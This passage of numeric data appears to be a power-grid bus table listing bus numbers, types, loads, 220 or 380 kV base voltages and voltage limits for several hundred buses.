0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1407, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1408, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1409, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1410, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1411, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1412, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1413, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1414, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1418, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1419, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1421, 2, 0, 0, 0, 0, 0, 0.999535, 0, 220.0, 0, 1.1, 0.9 ], [1422, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1423, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1424, 2, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [1425, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1426, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 
0.9 ], [1427, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1428, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1431, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1432, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1433, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1434, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1435, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1436, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1437, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1438, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1439, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1440, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1442, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1443, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1444, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1445, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1446, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1447, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1448, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1449, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1450, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1451, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1452, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1453, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1454, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1455, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1456, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1457, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1458, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1461, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1462, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1463, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1464, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1465, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1466, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1467, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1468, 2, 0, 
0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1469, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1470, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1471, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1472, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1473, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1474, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1475, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1476, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1477, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1480, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1482, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1483, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1484, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1485, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1486, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1489, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1490, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1491, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1492, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1493, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1494, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1495, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1497, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1498, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1500, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1501, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1503, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1504, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1510, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1511, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1512, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1513, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1517, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1518, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1519, 2, 0, 0, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [1, 1, 310.298834, 62.059767, 0, 
0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [2, 1, 0, 0, 0, 0, 0, 1.000012, 0, 380.0, 0, 1.1, 0.9 ], [3, 1, 54.387039, 10.877408, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [4, 1, 89.44129, 17.888258, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [5, 1, 0, 0, 0, 0, 0, 1.000161, 0, 380.0, 0, 1.1, 0.9 ], [6, 1, 262.636702, 52.52734, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [7, 1, 197.929415, 39.585883, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [8, 1, 165.613193, 33.122639, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [9, 1, 112.001614, 22.400323, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [10, 1, 0, 0, 0, 0, 0, 1.001249, 0, 380.0, 0, 1.1, 0.9 ], [11, 1, 98.132506, 19.626501, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [12, 1, 0, 0, 0, 0, 0, 1.000265, 0, 380.0, 0, 1.1, 0.9 ], [13, 1, 0, 0, 0, 0, 0, 1.000221, 0, 380.0, 0, 1.1, 0.9 ], [14, 1, 234.696956, 46.939391, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [15, 1, 0, 0, 0, 0, 0, 1.000414, 0, 380.0, 0, 1.1, 0.9 ], [16, 1, 400.267096, 80.053419, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [17, 1, 94.273416, 18.854683, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [18, 1, 0, 0, 0, 0, 0, 1.002955, 0, 380.0, 0, 1.1, 0.9 ], [19, 1, 232.914073, 46.582815, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [20, 1, 0, 0, 0, 0, 0, 0.997836, 0, 380.0, 0, 1.1, 0.9 ], [21, 1, 1001.56624, 200.313248, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [22, 1, 0, 0, 0, 0, 0, 1.000224, 0, 380.0, 0, 1.1, 0.9 ], [23, 1, 131.13898, 26.227796, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [24, 1, 0, 0, 0, 0, 0, 0.999994, 0, 380.0, 0, 1.1, 0.9 ], [25, 1, 62.724688, 12.544938, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [26, 1, 0, 0, 0, 0, 0, 1.000521, 0, 380.0, 0, 1.1, 0.9 ], [27, 1, 76.996291, 15.399258, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [28, 1, 227.500973, 45.500195, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [29, 1, 83.565844, 16.713169, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [30, 1, 0, 0, 0, 0, 0, 0.999619, 0, 380.0, 0, 1.1, 0.9 ], [31, 1, 164.455423, 32.891085, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [32, 1, 0, 0, 0, 0, 0, 
0.999574, 0, 380.0, 0, 1.1, 0.9 ], [33, 1, 206.196196, 41.239239, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [34, 1, 40.908358, 8.181672, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [35, 1, 2.70835, 0.54167, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [36, 1, 8.966956, 1.793391, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [37, 1, 0, 0, 0, 0, 0, 1.003481, 0, 380.0, 0, 1.1, 0.9 ], [38, 1, 216.033985, 43.206797, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [39, 1, 70.74, 14.148, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [40, 1, 73.890142, 14.778028, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [41, 1, 79.415156, 15.883031, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [42, 1, 0, 0, 0, 0, 0, 1.001319, 0, 380.0, 0, 1.1, 0.9 ], [43, 1, 121.786721, 24.357344, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [44, 1, 155.808052, 31.16161, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [45, 1, 82.706399, 16.54128, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [46, 1, 0, 0, 0, 0, 0, 0.999981, 0, 380.0, 0, 1.1, 0.9 ], [47, 1, 359.61406, 71.922812, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [48, 1, 247.186777, 49.437355, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [49, 1, 62.525784, 12.505157, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [50, 1, 91.045981, 18.209196, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [51, 1, 117.989648, 23.59793, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [52, 1, 0, 0, 0, 0, 0, 1.00014, 0, 380.0, 0, 1.1, 0.9 ], [53, 1, 179.030394, 35.806079, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [54, 1, 90.957863, 18.191573, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [55, 1, 89.203083, 17.840617, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [56, 1, 0, 0, 0, 0, 0, 0.999644, 0, 380.0, 0, 1.1, 0.9 ], [57, 1, 106.480616, 21.296123, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [58, 1, 243.910046, 48.782009, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [59, 1, 69.6622, 13.93244, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [60, 1, 36.727845, 7.345569, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [61, 1, 0, 0, 0, 0, 0, 0.999575, 0, 380.0, 0, 1.1, 0.9 ], [62, 1, 280.004982, 56.000996, 0, 0, 0, 
1.0, 0, 220.0, 0, 1.1, 0.9 ], [63, 1, 165.284543, 33.056909, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [64, 1, 1754.003961, 350.800792, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [65, 1, 5.844371, 1.168874, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [66, 1, 185.435215, 37.087043, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [67, 1, 397.789774, 79.557955, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [68, 1, 0, 0, 0, 0, 0, 0.998376, 0, 380.0, 0, 1.1, 0.9 ], [69, 1, 0, 0, 0, 0, 0, 0.999886, 0, 380.0, 0, 1.1, 0.9 ], [70, 1, 752.527522, 150.505504, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [71, 1, 174.877703, 34.975541, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [72, 1, 286.42568, 57.285136, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [73, 1, 91.695653, 18.339131, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [74, 1, 0, 0, 0, 0, 0, 1.001577, 0, 380.0, 0, 1.1, 0.9 ], [75, 1, 114.285057, 22.857011, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [76, 1, 110.310155, 22.062031, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [77, 1, 106.842924, 21.368585, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [78, 1, 0, 0, 0, 0, 0, 0.999181, 0, 380.0, 0, 1.1, 0.9 ], [79, 1, 110.323553, 22.064711, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [80, 1, 117.180636, 23.436127, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [81, 1, 132.280979, 26.456196, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [82, 1, 4.402389, 0.880478, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [83, 1, 294.552265, 58.910453, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [84, 1, 28.996853, 5.799371, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [85, 1, 100.555457, 20.111091, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [86, 1, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [87, 1, 0, 0, 0, 0, 0, 1.000253, 0, 380.0, 0, 1.1, 0.9 ], [88, 1, 81.161581, 16.232316, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [89, 1, 100.693364, 20.138673, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [90, 1, 116.296389, 23.259278, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [91, 1, 40.395575, 8.079115, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [92, 1, 44.085744, 
8.817149, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [93, 1, 43.239283, 8.647857, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [94, 1, 0, 0, 0, 0, 0, 1.001076, 0, 380.0, 0, 1.1, 0.9 ], [95, 1, 0, 0, 0, 0, 0, 1.000656, 0, 380.0, 0, 1.1, 0.9 ], [96, 1, 0, 0, 0, 0, 0, 0.999999, 0, 380.0, 0, 1.1, 0.9 ], [97, 1, 6.081282, 1.216256, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [98, 1, 111.810319, 22.362064, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [99, 1, 0, 0, 0, 0, 0, 1.000643, 0, 380.0, 0, 1.1, 0.9 ], [100, 1, 0, 0, 0, 0, 0, 1.001999, 0, 380.0, 0, 1.1, 0.9 ], [101, 1, 79.173108, 15.834622, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [102, 1, 153.243241, 30.648648, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [103, 1, 179.171001, 35.8342, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [104, 1, 0, 0, 0, 0, 0, 1.000068, 0, 380.0, 0, 1.1, 0.9 ], [105, 1, 0, 0, 0, 0, 0, 1.00014, 0, 380.0, 0, 1.1, 0.9 ], [106, 1, 0, 0, 0, 0, 0, 0.999962, 0, 380.0, 0, 1.1, 0.9 ], [107, 1, 0, 0, 0, 0, 0, 1.000005, 0, 380.0, 0, 1.1, 0.9 ], [108, 1, 126.383297, 25.276659, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [109, 1, 51.17044, 10.234088, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [110, 1, 66.421283, 13.284257, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [111, 1, 117.052248, 23.41045, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [112, 1, 59.243192, 11.848638, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [113, 1, 93.388733, 18.677747, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [114, 1, 137.538766, 27.507753, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [115, 1, 88.663157, 17.732631, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [116, 1, 148.3656, 29.67312, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [117, 1, 0, 0, 0, 0, 0, 1.000248, 0, 380.0, 0, 1.1, 0.9 ], [118, 1, 229.722902, 45.94458, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [119, 1, 44.529732, 8.905946, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [120, 1, 0, 0, 0, 0, 0, 1.000904, 0, 380.0, 0, 1.1, 0.9 ], [121, 1, 60.471396, 12.094279, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [122, 1, 52.942093, 10.588419, 0, 0, 0, 1.0, 0, 
380.0, 0, 1.1, 0.9 ], [123, 1, 0, 0, 0, 0, 0, 1.000084, 0, 380.0, 0, 1.1, 0.9 ], [124, 1, 0, 0, 0, 0, 0, 1.000004, 0, 380.0, 0, 1.1, 0.9 ], [125, 1, 0, 0, 0, 0, 0, 0.999514, 0, 380.0, 0, 1.1, 0.9 ], [126, 1, 277.576708, 55.515342, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [127, 1, 214.595997, 42.919199, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [128, 1, 0, 0, 0, 0, 0, 1.000887, 0, 380.0, 0, 1.1, 0.9 ], [129, 1, 0, 0, 0, 0, 0, 0.999994, 0, 380.0, 0, 1.1, 0.9 ], [130, 1, 295.888843, 59.177769, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [131, 1, 65.332, 13.0664, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [132, 1, 170.114652, 34.02293, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [133, 1, 56.981744, 11.396349, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [134, 1, 56.748405, 11.349681, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [135, 1, 56.823643, 11.364729, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [136, 1, 55.04674, 11.009348, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [137, 1, 44.032325, 8.806465, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [138, 1, 0, 0, 0, 0, 0, 1.000213, 0, 380.0, 0, 1.1, 0.9 ], [139, 1, 86.254863, 17.250973, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [140, 1, 59.648931, 11.929786, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [141, 1, 70.673454, 14.134691, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [142, 1, 77.766029, 15.553206, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [143, 1, 0, 0, 0, 0, 0, 0.999985, 0, 380.0, 0, 1.1, 0.9 ], [144, 1, 70.836812, 14.167362, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [145, 1, 206.06616, 41.213232, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [146, 1, 265.658045, 53.131609, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [147, 1, 162.832738, 32.566548, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [148, 1, 229.786886, 45.957377, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [149, 1, 148.141943, 29.628389, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [150, 1, 193.414688, 38.682938, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [151, 1, 45.577876, 9.115575, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [152, 1, 94.614944, 
18.922989, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [153, 1, 168.808447, 33.761689, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [154, 1, 173.399774, 34.679955, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [155, 1, 180.61119, 36.122238, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [156, 1, 0, 0, 0, 0, 0, 0.999987, 0, 380.0, 0, 1.1, 0.9 ], [157, 1, 0, 0, 0, 0, 0, 1.001028, 0, 380.0, 0, 1.1, 0.9 ], [158, 1, 47.585034, 9.517007, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [159, 1, 0, 0, 0, 0, 0, 1.001257, 0, 380.0, 0, 1.1, 0.9 ], [160, 1, 0, 0, 0, 0, 0, 1.000006, 0, 380.0, 0, 1.1, 0.9 ], [161, 1, 147.72428, 29.544856, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [162, 1, 220.804019, 44.160804, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [163, 1, 44.158718, 8.831744, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [164, 1, 44.336307, 8.867261, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [165, 1, 0, 0, 0, 0, 0, 1.000009, 0, 380.0, 0, 1.1, 0.9 ], [166, 1, 51.836316, 10.367263, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [167, 1, 72.920648, 14.58413, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [168, 1, 49.767412, 9.953482, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [169, 1, 170.3682, 34.07364, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [170, 1, 128.017336, 25.603467, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [171, 1, 109.262748, 21.85255, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [172, 1, 53.62318, 10.724636, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [173, 1, 51.226008, 10.245202, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [174, 1, 76.871884, 15.374377, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [175, 1, 51.192435, 10.238487, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [176, 1, 178.386627, 35.677325, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [177, 1, 29.088539, 5.817708, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [178, 1, 154.060036, 30.812007, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [179, 1, 56.765806, 11.353161, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [180, 1, 49.898596, 9.979719, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [181, 1, 37.662023, 7.532405, 0, 0, 0, 1.0, 0, 
220.0, 0, 1.1, 0.9 ], [182, 1, 1.706107, 0.341221, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [183, 1, 510.691565, 102.138313, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [184, 1, 0, 0, 0, 0, 0, 0.999361, 0, 380.0, 0, 1.1, 0.9 ], [185, 1, 109.208438, 21.841688, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [186, 1, 58.808176, 11.761635, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [187, 1, 34.396795, 6.879359, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [188, 1, 51.192435, 10.238487, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [189, 1, 187.844148, 37.56883, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [190, 1, 248.459031, 49.691806, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [191, 1, 0, 0, 0, 0, 0, 1.000009, 0, 380.0, 0, 1.1, 0.9 ], [192, 1, 59.836461, 11.967292, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [193, 1, 51.109857, 10.221971, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [194, 1, 35.281953, 7.056391, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [195, 1, 0, 0, 0, 0, 0, 1.0, 0, 380.0, 0, 1.1, 0.9 ], [196, 1, 49.498523, 9.899705, 0, 0, 0, 1.0, 0, 220.0, 0, 1.1, 0.9 ], [197, 1, 78.42384, 15.684768, 0, 0, 0, 